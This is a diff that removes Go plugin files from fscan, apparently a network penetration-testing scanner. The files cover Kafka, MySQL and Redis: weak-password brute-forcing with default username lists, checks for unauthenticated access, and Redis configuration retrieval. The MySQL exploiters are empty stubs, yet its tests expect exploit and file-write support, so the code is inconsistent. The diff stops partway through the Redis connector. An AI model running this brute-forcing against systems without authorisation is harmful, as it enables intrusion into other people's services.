-// NewKafkaExploiter 创建Kafka利用器
-func NewKafkaExploiter() *KafkaExploiter {
-	exploiter := &KafkaExploiter{
-		BaseExploiter: base.NewBaseExploiter("kafka"),
-	}
-	
-	// Kafka插件不提供利用功能
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *KafkaExploiter) setupExploitMethods() {
-	// Kafka插件不提供利用功能，仅进行弱密码扫描和未授权访问检测
-}
-
-// Exploit 利用接口实现 - 空实现
-func (e *KafkaExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// Kafka插件不提供利用功能
-	return nil, nil
-}

Plugins/services/kafka/plugin.go

@@ -1,216 +0,0 @@
-package kafka
-
-import (
-	"context"
-	"fmt"
-	"strings"
-	"time"
-
-	"github.com/IBM/sarama"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// KafkaPlugin Kafka插件实现
-type KafkaPlugin struct {
-	*base.ServicePlugin
-	exploiter *KafkaExploiter
-}
-
-// NewKafkaPlugin 创建Kafka插件
-func NewKafkaPlugin() *KafkaPlugin {
-	// 插件元数据
-	metadata := &base.PluginMetadata{
-		Name:        "kafka",
-		Version:     "2.0.0",
-		Author:      "fscan-team",
-		Description: "Apache Kafka消息队列扫描和利用插件",
-		Category:    "service",
-		Ports:       []int{9092, 9093, 9094}, // Kafka常用端口
-		Protocols:   []string{"tcp"},
-		Tags:        []string{"kafka", "message-queue", "bruteforce", "unauthorized"},
-	}
-	
-	// 创建连接器和服务插件
-	connector := NewKafkaConnector()
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 创建Kafka插件
-	plugin := &KafkaPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewKafkaExploiter(),
-	}
-	
-	// 设置能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,
-		base.CapDataExtraction,
-	})
-	
-	return plugin
-}
-
-// Scan 重写扫描方法，先检测无认证访问
-func (p *KafkaPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	// 如果禁用了暴力破解，只进行服务识别
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-	
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 先尝试无认证访问
-	unauthCred := &base.Credential{Username: "", Password: ""}
-	unauthResult, err := p.ScanCredential(ctx, info, unauthCred)
-	if err == nil && unauthResult.Success {
-		// 无认证访问成功
-		common.LogSuccess(i18n.GetText("kafka_unauth_access", target))
-		
-		return &base.ScanResult{
-			Success:     true,
-			Service:     "Kafka",
-			Credentials: []*base.Credential{unauthCred},
-			Extra: map[string]interface{}{
-				"service":       "Kafka",
-				"port":          info.Ports,
-				"unauthorized":  true,
-				"access_type":   "no_authentication",
-			},
-		}, nil
-	}
-	
-	// 执行基础的密码扫描
-	result, err := p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err
-	}
-	
-	// 记录成功的弱密码发现
-	cred := result.Credentials[0]
-	common.LogSuccess(i18n.GetText("kafka_weak_pwd_success", target, cred.Username, cred.Password))
-	
-	return result, nil
-}
-
-// generateCredentials 重写凭据生成方法
-func (p *KafkaPlugin) generateCredentials() []*base.Credential {
-	// 获取Kafka专用的用户名字典
-	usernames := common.Userdict["kafka"]
-	if len(usernames) == 0 {
-		// 默认Kafka用户名
-		usernames = []string{"admin", "kafka", "test", "user", "root"}
-	}
-	
-	return base.GenerateCredentials(usernames, common.Passwords)
-}
-
-// Exploit 使用exploiter执行利用
-func (p *KafkaPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *KafkaPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *KafkaPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// performServiceIdentification 执行Kafka服务识别（-nobr模式）
-func (p *KafkaPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试连接Kafka获取版本信息
-	kafkaInfo, isKafka := p.identifyKafkaService(ctx, info)
-	if isKafka {
-		// 记录服务识别成功
-		common.LogSuccess(i18n.GetText("kafka_service_identified", target, kafkaInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: "Kafka",
-			Banner:  kafkaInfo,
-			Extra: map[string]interface{}{
-				"service": "Kafka",
-				"port":    info.Ports,
-				"info":    kafkaInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为Kafka，返回失败
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为Kafka服务"),
-	}, nil
-}
-
-// identifyKafkaService 通过连接识别Kafka服务
-func (p *KafkaPlugin) identifyKafkaService(ctx context.Context, info *common.HostInfo) (string, bool) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	timeout := time.Duration(common.Timeout) * time.Second
-
-	config := sarama.NewConfig()
-	config.Net.DialTimeout = timeout
-	config.Net.ReadTimeout = timeout
-	config.Net.WriteTimeout = timeout
-	config.Net.TLS.Enable = false
-	config.Version = sarama.V2_0_0_0
-
-	brokers := []string{target}
-	
-	// 尝试创建客户端连接
-	client, err := sarama.NewClient(brokers, config)
-	if err != nil {
-		// 检查错误是否表明这是Kafka服务但认证失败
-		if strings.Contains(strings.ToLower(err.Error()), "kafka") ||
-			strings.Contains(strings.ToLower(err.Error()), "sasl") ||
-			strings.Contains(strings.ToLower(err.Error()), "authentication") {
-			return fmt.Sprintf("Kafka服务 (需要认证): %v", err), true
-		}
-		return "", false
-	}
-	defer client.Close()
-	
-	// 获取集群信息
-	brokerList := client.Brokers()
-	if len(brokerList) > 0 {
-		return fmt.Sprintf("Kafka集群 (Brokers: %d)", len(brokerList)), true
-	}
-	
-	return "Kafka服务", true
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterKafkaPlugin 注册Kafka插件
-func RegisterKafkaPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "kafka",
-			Version:     "2.0.0",
-			Author:      "fscan-team",
-			Description: "Apache Kafka消息队列扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{9092, 9093, 9094}, // Kafka常用端口
-			Protocols:   []string{"tcp"},
-			Tags:        []string{"kafka", "message-queue", "bruteforce", "unauthorized"},
-		},
-		func() base.Plugin {
-			return NewKafkaPlugin()
-		},
-	)
-	
-	base.GlobalPluginRegistry.Register("kafka", factory)
-}
-
-// 自动注册
-func init() {
-	RegisterKafkaPlugin()
-}

Plugins/services/mysql/connector.go

@@ -1,187 +0,0 @@
-package mysql
-
-import (
-	"context"
-	"database/sql"
-	"fmt"
-	"net"
-	"strconv"
-	"time"
-
-	"github.com/go-sql-driver/mysql"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// MySQLConnector 实现MySQL数据库服务连接器
-// 遵循 base.ServiceConnector 接口规范，提供标准化的MySQL连接和认证功能
-
-// MySQLConnector MySQL数据库连接器
-type MySQLConnector struct {
-	host    string        // 目标主机地址
-	port    int           // 目标端口号
-}
-
-// NewMySQLConnector 创建新的MySQL连接器实例
-// 自动注册SOCKS代理支持，统一使用Context超时控制
-func NewMySQLConnector() *MySQLConnector {
-	connector := &MySQLConnector{}
-	
-	// 注册SOCKS代理支持的dialer（如果配置了代理）
-	connector.registerProxyDialer()
-	
-	return connector
-}
-
-// Connect 建立到MySQL服务的基础连接
-// 实现 base.ServiceConnector 接口的 Connect 方法
-func (c *MySQLConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	// 解析目标端口号
-	port, err := strconv.Atoi(info.Ports)
-	if err != nil {
-		return nil, fmt.Errorf("无效的端口号: %s", info.Ports)
-	}
-	
-	// 缓存目标信息，供认证阶段使用
-	c.host = info.Host
-	c.port = port
-	
-	// 构建基础连接字符串（无认证信息）
-	connStr := c.buildConnectionString(info.Host, port, "", "")
-	
-	// 创建数据库连接实例
-	db, err := sql.Open("mysql", connStr)
-	if err != nil {
-		return nil, fmt.Errorf("创建连接失败: %v", err)
-	}
-
-	// 配置连接池参数
-	timeout := time.Duration(common.Timeout) * time.Second
-	db.SetConnMaxLifetime(timeout)
-	db.SetConnMaxIdleTime(timeout)
-	db.SetMaxIdleConns(0)
-	
-	return db, nil
-}
-
-// Authenticate 使用凭据对MySQL服务进行身份认证
-// 实现 base.ServiceConnector 接口的 Authenticate 方法
-// 关键优化：使用独立的Context避免上游超时问题，并优化内存使用
-func (c *MySQLConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	// 直接使用传入的Context，它已经包含了正确的超时设置
-	
-	// 内存优化：预构建连接字符串，避免重复分配
-	connStr := c.buildConnectionString(c.host, c.port, cred.Username, cred.Password)
-	common.LogDebug(fmt.Sprintf("MySQL尝试认证: %s@%s:%d", cred.Username, c.host, c.port))
-	
-	// 内存优化：直接建立连接而不创建连接池
-	// 避免为单次认证创建不必要的连接池开销
-	rawConn, err := c.connectDirect(ctx, connStr)
-	if err != nil {
-		common.LogDebug(fmt.Sprintf("MySQL直连失败: %s@%s:%d - %v", cred.Username, c.host, c.port, err))
-		return fmt.Errorf("连接失败: %v", err)
-	}
-	defer rawConn.Close()
-	
-	// 执行简单的认证验证
-	err = c.validateConnection(ctx, rawConn)
-	if err != nil {
-		common.LogDebug(fmt.Sprintf("MySQL认证失败: %s@%s:%d - %v", cred.Username, c.host, c.port, err))
-		return fmt.Errorf("认证失败: %v", err)
-	}
-	
-	common.LogDebug(fmt.Sprintf("MySQL认证成功: %s@%s:%d", cred.Username, c.host, c.port))
-	return nil
-}
-
-// Close 关闭MySQL连接
-// 实现 base.ServiceConnector 接口的 Close 方法
-func (c *MySQLConnector) Close(conn interface{}) error {
-	if db, ok := conn.(*sql.DB); ok {
-		return db.Close()
-	}
-	return nil
-}
-
-// connectWithCredentials 使用凭据创建新连接
-func (c *MySQLConnector) connectWithCredentials(ctx context.Context, originalDB *sql.DB, cred *base.Credential) (*sql.DB, error) {
-	// 从原始连接中提取主机和端口信息
-	// 这里简化处理，实际应该从原始连接字符串中解析
-	// 为了示例，我们假设可以从某种方式获取主机端口信息
-	
-	// 临时解决方案：重新构建连接字符串
-	connStr := c.buildConnectionStringWithCredentials(cred)
-	
-	db, err := sql.Open("mysql", connStr)
-	if err != nil {
-		return nil, fmt.Errorf("创建认证连接失败: %v", err)
-	}
-	
-	return db, nil
-}
-
-// buildConnectionString 构建MySQL连接字符串
-// 根据是否配置SOCKS代理选择合适的连接方式
-// 移除timeout参数，统一使用Context控制超时
-func (c *MySQLConnector) buildConnectionString(host string, port int, username, password string) string {
-	// 根据代理配置选择网络类型
-	if common.Socks5Proxy != "" {
-		// SOCKS代理连接模式，移除timeout参数，由Context控制
-		return fmt.Sprintf("%v:%v@tcp-proxy(%v:%v)/mysql?charset=utf8",
-			username, password, host, port)
-	} else {
-		// 标准TCP直连模式，移除timeout参数，由Context控制
-		return fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8",
-			username, password, host, port)
-	}
-}
-
-// buildConnectionStringWithCredentials 构建带凭据的连接字符串
-func (c *MySQLConnector) buildConnectionStringWithCredentials(cred *base.Credential) string {
-	// 使用保存的主机和端口信息
-	return c.buildConnectionString(c.host, c.port, cred.Username, cred.Password)
-}
-
-// connectDirect 内存优化：直接建立MySQL连接，避免连接池开销
-// 用于单次认证场景，减少内存分配和资源浪费
-func (c *MySQLConnector) connectDirect(ctx context.Context, connStr string) (*sql.Conn, error) {
-	// 创建最小化配置的临时数据库实例
-	db, err := sql.Open("mysql", connStr)
-	if err != nil {
-		return nil, fmt.Errorf("创建连接实例失败: %v", err)
-	}
-	defer db.Close() // 确保临时db实例被清理
-	
-	// 禁用连接池以减少内存开销
-	db.SetMaxOpenConns(1)
-	db.SetMaxIdleConns(0)
-	db.SetConnMaxLifetime(0)
-	
-	// 获取原始连接
-	conn, err := db.Conn(ctx)
-	if err != nil {
-		return nil, fmt.Errorf("获取连接失败: %v", err)
-	}
-	
-	return conn, nil
-}
-
-// validateConnection 内存优化：轻量级连接验证
-// 使用最小开销的方式验证MySQL连接有效性
-func (c *MySQLConnector) validateConnection(ctx context.Context, conn *sql.Conn) error {
-	// 使用传入的Context进行验证，统一超时控制
-	return conn.PingContext(ctx)
-}
-
-// registerProxyDialer 注册SOCKS代理支持的网络拨号器
-// 仅在配置了SOCKS代理时才注册，避免不必要的开销
-func (c *MySQLConnector) registerProxyDialer() {
-	if common.Socks5Proxy == "" {
-		return // 未配置代理，跳过注册
-	}
-	
-	// 向MySQL驱动注册自定义的代理拨号器
-	mysql.RegisterDialContext("tcp-proxy", func(ctx context.Context, addr string) (net.Conn, error) {
-		return common.WrapperTcpWithContext(ctx, "tcp", addr)
-	})
-}

Plugins/services/mysql/exploiter.go

@@ -1,36 +0,0 @@
-package mysql
-
-import (
-	"context"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// MySQLExploiter MySQL利用器实现 - 最小化版本，不提供利用功能
-type MySQLExploiter struct {
-	*base.BaseExploiter
-}
-
-// NewMySQLExploiter 创建MySQL利用器
-func NewMySQLExploiter() *MySQLExploiter {
-	exploiter := &MySQLExploiter{
-		BaseExploiter: base.NewBaseExploiter("mysql"),
-	}
-	
-	// MySQL插件不提供利用功能
-	exploiter.setupExploitMethods()
-	
-	return exploiter
-}
-
-// setupExploitMethods 设置利用方法
-func (e *MySQLExploiter) setupExploitMethods() {
-	// MySQL插件不提供利用功能，仅进行弱密码扫描
-}
-
-// Exploit 利用接口实现 - 空实现
-func (e *MySQLExploiter) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	// MySQL插件不提供利用功能
-	return nil, nil
-}

Plugins/services/mysql/mysql_test.go

@@ -1,146 +0,0 @@
-package mysql
-
-import (
-	"context"
-	"fmt"
-	"testing"
-	"time"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-func TestMySQLPlugin(t *testing.T) {
-	// 初始化基本配置（超时时间以秒为单位）
-	common.Timeout = 3  // 3秒超时，不是3000秒
-	common.MaxRetries = 2
-	common.ModuleThreadNum = 5
-	common.DisableBrute = false
-	
-	// 创建插件
-	plugin := NewMySQLPlugin()
-	
-	// 测试插件元数据
-	metadata := plugin.GetMetadata()
-	if metadata.Name != "mysql" {
-		t.Errorf("期望插件名为 'mysql'，实际为 '%s'", metadata.Name)
-	}
-	
-	// 测试能力
-	capabilities := plugin.GetCapabilities()
-	if len(capabilities) == 0 {
-		t.Error("插件应该有能力定义")
-	}
-	
-	// 测试利用方法
-	exploitMethods := plugin.GetExploitMethods()
-	if len(exploitMethods) == 0 {
-		t.Error("插件应该有利用方法定义")
-	}
-	
-	t.Logf("MySQL插件测试通过，能力数量: %d，利用方法数量: %d", 
-		len(capabilities), len(exploitMethods))
-}
-
-func TestMySQLConnector(t *testing.T) {
-	connector := NewMySQLConnector()
-	
-	// 创建测试主机信息
-	hostInfo := &common.HostInfo{
-		Host:  "127.0.0.1",
-		Ports: "3306",
-	}
-	
-	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
-	defer cancel()
-	
-	// 测试连接（这会失败，但我们测试的是接口）
-	_, err := connector.Connect(ctx, hostInfo)
-	
-	// 我们期望这里出错，因为没有实际的MySQL服务器
-	// 但接口应该正常工作
-	if err == nil {
-		t.Log("连接器接口正常工作")
-	} else {
-		t.Logf("连接器测试完成，错误（预期）: %v", err)
-	}
-}
-
-func TestCredentialGeneration(t *testing.T) {
-	// 测试凭据生成
-	usernames := []string{"root", "mysql", "admin"}
-	passwords := []string{"password", "123456", "{user}"}
-	
-	credentials := base.GenerateCredentials(usernames, passwords)
-	
-	expectedCount := len(usernames) * len(passwords)
-	if len(credentials) != expectedCount {
-		t.Errorf("期望生成 %d 个凭据，实际生成 %d 个", expectedCount, len(credentials))
-	}
-	
-	// 检查 {user} 占位符替换
-	found := false
-	for _, cred := range credentials {
-		if cred.Username == "root" && cred.Password == "root" {
-			found = true
-			break
-		}
-	}
-	
-	if !found {
-		t.Error("没有找到 {user} 占位符替换的凭据")
-	}
-	
-	t.Logf("凭据生成测试通过，生成 %d 个凭据", len(credentials))
-}
-
-func TestExploitMethods(t *testing.T) {
-	exploiter := NewMySQLExploiter()
-	methods := exploiter.GetExploitMethods()
-	
-	// 检查是否有信息收集方法
-	hasInfoGathering := false
-	for _, method := range methods {
-		if method.Name == "information_gathering" {
-			hasInfoGathering = true
-			break
-		}
-	}
-	
-	if !hasInfoGathering {
-		t.Error("应该包含信息收集利用方法")
-	}
-	
-	// 检查利用类型支持
-	if !exploiter.IsExploitSupported(base.ExploitDataExtraction) {
-		t.Error("应该支持数据提取利用")
-	}
-	
-	if !exploiter.IsExploitSupported(base.ExploitFileWrite) {
-		t.Error("应该支持文件写入利用")
-	}
-	
-	t.Logf("利用方法测试通过，方法数量: %d", len(methods))
-}
-
-// 基准测试：插件创建性能
-func BenchmarkPluginCreation(b *testing.B) {
-	for i := 0; i < b.N; i++ {
-		plugin := NewMySQLPlugin()
-		_ = plugin
-	}
-}
-
-// 基准测试：凭据生成性能
-func BenchmarkCredentialGeneration(b *testing.B) {
-	usernames := []string{"root", "mysql", "admin", "test", "user"}
-	passwords := make([]string, 100) // 模拟100个密码
-	for i := range passwords {
-		passwords[i] = fmt.Sprintf("password%d", i)
-	}
-	
-	b.ResetTimer()
-	for i := 0; i < b.N; i++ {
-		credentials := base.GenerateCredentials(usernames, passwords)
-		_ = credentials
-	}
-}

Plugins/services/mysql/plugin.go

@@ -1,245 +0,0 @@
-package mysql
-
-import (
-	"context"
-	"fmt"
-	"net"
-	"regexp"
-	"time"
-
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
-)
-
-// MySQL插件：新一代插件架构的完整实现示例
-// 展示了如何正确实现服务扫描、凭据爆破、自动利用等功能
-// 本插件可作为其他数据库插件迁移的标准参考模板
-
-// MySQLPlugin MySQL数据库扫描和利用插件
-// 集成了弱密码检测、自动利用、信息收集等完整功能
-type MySQLPlugin struct {
-	*base.ServicePlugin              // 继承基础服务插件功能
-	exploiter           *MySQLExploiter // MySQL专用利用模块
-}
-
-// NewMySQLPlugin 创建新的MySQL插件实例
-// 这是标准的插件工厂函数，展示了新架构的完整初始化流程
-func NewMySQLPlugin() *MySQLPlugin {
-	// 定义插件元数据 - 这些信息用于插件注册和管理
-	metadata := &base.PluginMetadata{
-		Name:        "mysql",                              // 插件唯一标识符
-		Version:     "2.0.0",                             // 插件版本（新架构版本）
-		Author:      "fscan-team",                        // 开发团队
-		Description: "MySQL数据库扫描和利用插件",          // 功能描述
-		Category:    "service",                           // 插件类别
-		Ports:       []int{3306, 3307, 33060, 33061, 33062}, // MySQL常用端口，包括默认端口和备用端口
-		Protocols:   []string{"tcp"},                     // 支持的协议
-		Tags:        []string{"database", "mysql", "bruteforce", "exploit"}, // 功能标签
-	}
-	
-	// 创建MySQL专用连接器
-	connector := NewMySQLConnector()
-	
-	// 基于连接器创建基础服务插件
-	servicePlugin := base.NewServicePlugin(metadata, connector)
-	
-	// 组装完整的MySQL插件
-	plugin := &MySQLPlugin{
-		ServicePlugin: servicePlugin,
-		exploiter:     NewMySQLExploiter(), // 集成利用模块
-	}
-	
-	// 声明插件具备的安全测试能力
-	plugin.SetCapabilities([]base.Capability{
-		base.CapWeakPassword,    // 弱密码检测
-		base.CapDataExtraction, // 数据提取
-		base.CapFileWrite,      // 文件写入
-		base.CapSQLInjection,   // SQL注入
-		base.CapInformationLeak, // 信息泄露
-	})
-	
-	return plugin
-}
-
-// Scan 执行MySQL服务的完整安全扫描
-// 重写基础扫描方法，集成弱密码检测和自动利用功能
-func (p *MySQLPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 如果禁用暴力破解，则进行基础服务识别
-	if common.DisableBrute {
-		return p.performServiceIdentification(ctx, info)
-	}
-	
-	// 调用基础服务插件进行弱密码扫描
-	result, err := p.ServicePlugin.Scan(ctx, info)
-	if err != nil || !result.Success {
-		return result, err // 扫描失败，直接返回
-	}
-	
-	// 记录成功的弱密码发现（使用i18n）
-	cred := result.Credentials[0]
-	common.LogSuccess(i18n.GetText("mysql_scan_success", target, cred.Username, cred.Password))
-	
-	// 自动利用功能（可通过-ne参数禁用）
-	if result.Success && len(result.Credentials) > 0 && !common.DisableExploit {
-		// 异步执行利用攻击，避免阻塞扫描进程
-		go p.autoExploit(context.Background(), info, result.Credentials[0])
-	}
-	
-	return result, nil
-}
-
-// autoExploit 自动利用
-func (p *MySQLPlugin) autoExploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	common.LogDebug(i18n.GetText("plugin_exploit_start", "MySQL", target))
-	
-	// 执行利用
-	result, err := p.exploiter.Exploit(ctx, info, creds)
-	if err != nil {
-		common.LogError(i18n.GetText("plugin_exploit_failed", "MySQL", err))
-		return
-	}
-	
-	if result != nil && result.Success {
-		common.LogSuccess(i18n.GetText("plugin_exploit_success", "MySQL", i18n.GetExploitMethodName(result.Method)))
-		base.SaveExploitResult(info, result, "MySQL")
-	}
-}
-
-// Exploit 手动利用接口
-func (p *MySQLPlugin) Exploit(ctx context.Context, info *common.HostInfo, creds *base.Credential) (*base.ExploitResult, error) {
-	return p.exploiter.Exploit(ctx, info, creds)
-}
-
-// GetExploitMethods 获取利用方法
-func (p *MySQLPlugin) GetExploitMethods() []base.ExploitMethod {
-	return p.exploiter.GetExploitMethods()
-}
-
-// IsExploitSupported 检查利用支持
-func (p *MySQLPlugin) IsExploitSupported(method base.ExploitType) bool {
-	return p.exploiter.IsExploitSupported(method)
-}
-
-// generateCredentials 重写凭据生成方法
-func (p *MySQLPlugin) generateCredentials() []*base.Credential {
-	// 获取MySQL专用的用户名字典
-	usernames := common.Userdict["mysql"]
-	if len(usernames) == 0 {
-		// 默认MySQL用户名
-		usernames = []string{"root", "admin", "mysql"}
-	}
-	
-	return base.GenerateCredentials(usernames, common.Passwords)
-}
-
-// performServiceIdentification 执行MySQL服务识别（-nobr模式）
-func (p *MySQLPlugin) performServiceIdentification(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 尝试连接到MySQL服务获取握手包
-	conn, err := common.WrapperTcpWithTimeout("tcp", target, time.Duration(common.Timeout)*time.Second)
-	if err != nil {
-		return &base.ScanResult{
-			Success: false,
-			Error:   err,
-		}, nil
-	}
-	defer conn.Close()
-	
-	// 读取MySQL握手包
-	mysqlInfo, isMySQL := p.identifyMySQLService(conn)
-	if isMySQL {
-		// 记录服务识别成功
-		common.LogSuccess(i18n.GetText("mysql_service_identified", target, mysqlInfo))
-		
-		return &base.ScanResult{
-			Success: true,
-			Service: "MySQL",
-			Banner:  mysqlInfo,
-			Extra: map[string]interface{}{
-				"service": "MySQL",
-				"port":    info.Ports,
-				"info":    mysqlInfo,
-			},
-		}, nil
-	}
-	
-	// 如果无法识别为MySQL，返回失败
-	return &base.ScanResult{
-		Success: false,
-		Error:   fmt.Errorf("无法识别为MySQL服务"),
-	}, nil
-}
-
-// identifyMySQLService 通过握手包识别MySQL服务
-func (p *MySQLPlugin) identifyMySQLService(conn net.Conn) (string, bool) {
-	// 设置读取超时
-	conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
-	
-	// MySQL服务器在连接后会主动发送握手包
-	handshake := make([]byte, 1024)
-	n, err := conn.Read(handshake)
-	if err != nil || n < 10 {
-		return "", false
-	}
-	
-	// 检查MySQL握手包格式
-	// MySQL握手包开始: 包长度(3字节) + 序号(1字节) + 协议版本(1字节)
-	if handshake[4] != 10 { // MySQL 协议版本通常是10
-		return "", false
-	}
-	
-	// 提取版本字符串（从第5字节开始到第一个0结束）
-	versionStart := 5
-	versionEnd := versionStart
-	for versionEnd < n && handshake[versionEnd] != 0 {
-		versionEnd++
-	}
-	
-	if versionEnd <= versionStart {
-		return "", false
-	}
-	
-	versionStr := string(handshake[versionStart:versionEnd])
-	
-	// 验证版本字符串是否包含MySQL标识
-	if len(versionStr) > 0 && (regexp.MustCompile(`\d+\.\d+`).MatchString(versionStr)) {
-		return fmt.Sprintf("MySQL版本: %s", versionStr), true
-	}
-	
-	return "", false
-}
-
-// =============================================================================
-// 插件注册
-// =============================================================================
-
-// RegisterMySQLPlugin 注册MySQL插件
-func RegisterMySQLPlugin() {
-	factory := base.NewSimplePluginFactory(
-		&base.PluginMetadata{
-			Name:        "mysql",
-			Version:     "2.0.0",
-			Author:      "fscan-team", 
-			Description: "MySQL数据库扫描和利用插件",
-			Category:    "service",
-			Ports:       []int{3306, 3307, 33060, 33061, 33062},
-			Protocols:   []string{"tcp"},
-			Tags:        []string{"database", "mysql", "bruteforce", "exploit"},
-		},
-		func() base.Plugin {
-			return NewMySQLPlugin()
-		},
-	)
-	
-	base.GlobalPluginRegistry.Register("mysql", factory)
-}
-
-// 自动注册
-func init() {
-	RegisterMySQLPlugin()
-}

Plugins/services/redis/connector.go

@@ -1,302 +0,0 @@
-package redis
-
-import (
-	"context"
-	"fmt"
-	"github.com/shadow1ng/fscan/common"
-	"github.com/shadow1ng/fscan/plugins/base"
-	"io"
-	"net"
-	"strings"
-	"time"
-)
-
-// RedisConnection Redis连接包装
-type RedisConnection struct {
-	conn net.Conn
-	authenticated bool
-	config *RedisConfig
-}
-
-// RedisConfig Redis配置信息
-type RedisConfig struct {
-	DBFilename string
-	Dir        string
-}
-
-// RedisConnector Redis连接器实现
-type RedisConnector struct {
-}
-
-// NewRedisConnector 创建Redis连接器
-func NewRedisConnector() *RedisConnector {
-	return &RedisConnector{}
-}
-
-// Connect 连接到Redis服务
-func (c *RedisConnector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-	target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-	
-	// 使用Context控制超时的TCP连接
-	timeout := time.Duration(common.Timeout) * time.Second
-	conn, err := common.WrapperTcpWithTimeout("tcp", target, timeout)
-	if err != nil {
-		return nil, fmt.Errorf("连接失败: %v", err)
-	}
-	
-	// 创建Redis连接包装
-	redisConn := &RedisConnection{
-		conn: conn,
-		authenticated: false,
-		config: &RedisConfig{},
-	}
-	
-	return redisConn, nil
-}
-
-// Authenticate 认证
-func (c *RedisConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-	redisConn, ok := conn.(*RedisConnection)
-	if !ok {
-		return fmt.Errorf("无效的连接类型")
-	}
-	
-	// 如果没有密码，先检查未授权访问
-	if cred == nil || cred.Password == "" {
-		return c.checkUnauthorizedAccess(redisConn)
-	}
-	
-	// 有密码的情况下进行认证
-	return c.authenticateWithPassword(redisConn, cred.Password)
-}
-
-// Close 关闭连接
-func (c *RedisConnector) Close(conn interface{}) error {
-	if redisConn, ok := conn.(*RedisConnection); ok {
-		if redisConn.conn != nil {
-			return redisConn.conn.Close()
-		}
-	}
-	return nil
-}
-
-// checkUnauthorizedAccess 检查未授权访问
-func (c *RedisConnector) checkUnauthorizedAccess(conn *RedisConnection) error {
-	// 发送INFO命令测试
-	if err := c.sendCommand(conn, "INFO"); err != nil {
-		return fmt.Errorf("发送INFO命令失败: %v", err)
-	}
-	
-	// 读取响应
-	response, err := c.readResponse(conn)
-	if err != nil {
-		return fmt.Errorf("读取响应失败: %v", err)
-	}
-	
-	// 检查是否包含Redis版本信息
-	if !strings.Contains(response, "redis_version") {
-		return fmt.Errorf("未发现Redis未授权访问")
-	}
-	
-	// 获取配置信息
-	if err := c.getConfig(conn); err != nil {
-		common.LogDebug(fmt.Sprintf("获取Redis配置失败: %v", err))
-	}
-	
-	conn.authenticated = true
-	return nil
-}
-
-// authenticateWithPassword 使用密码认证
-func (c *RedisConnector) authenticateWithPassword(conn *RedisConnection, password string) error {
-	// 发送AUTH命令
-	authCmd := fmt.Sprintf("AUTH %s", password)
-	if err := c.sendCommand(conn, authCmd); err != nil {
-		return fmt.Errorf("发送AUTH命令失败: %v", err)
-	}
-	
-	// 读取响应
-	response, err := c.readResponse(conn)
-	if err != nil {
-		return fmt.Errorf("读取响应失败: %v", err)
-	}
-	
-	// 检查认证结果
-	if !strings.Contains(response, "+OK") {
-		return fmt.Errorf("认证失败")
-	}
-	
-	// 获取配置信息
-	if err := c.getConfig(conn); err != nil {
-		common.LogDebug(fmt.Sprintf("获取Redis配置失败: %v", err))
-	}
-	
-	conn.authenticated = true
-	return nil
-}
-
-// sendCommand 发送Redis命令
-func (c *RedisConnector) sendCommand(conn *RedisConnection, command string) error {
-	// 使用统一的超时设置
-	timeout := time.Duration(common.Timeout) * time.Second
-	conn.conn.SetWriteDeadline(time.Now().Add(timeout))
-	
-	// 发送命令（添加CRLF）
-	_, err := conn.conn.Write([]byte(command + "\r\n"))
-	return err
-}
-
-// readResponse 读取Redis响应
-func (c *RedisConnector) readResponse(conn *RedisConnection) (string, error) {
-	// 使用统一的超时设置
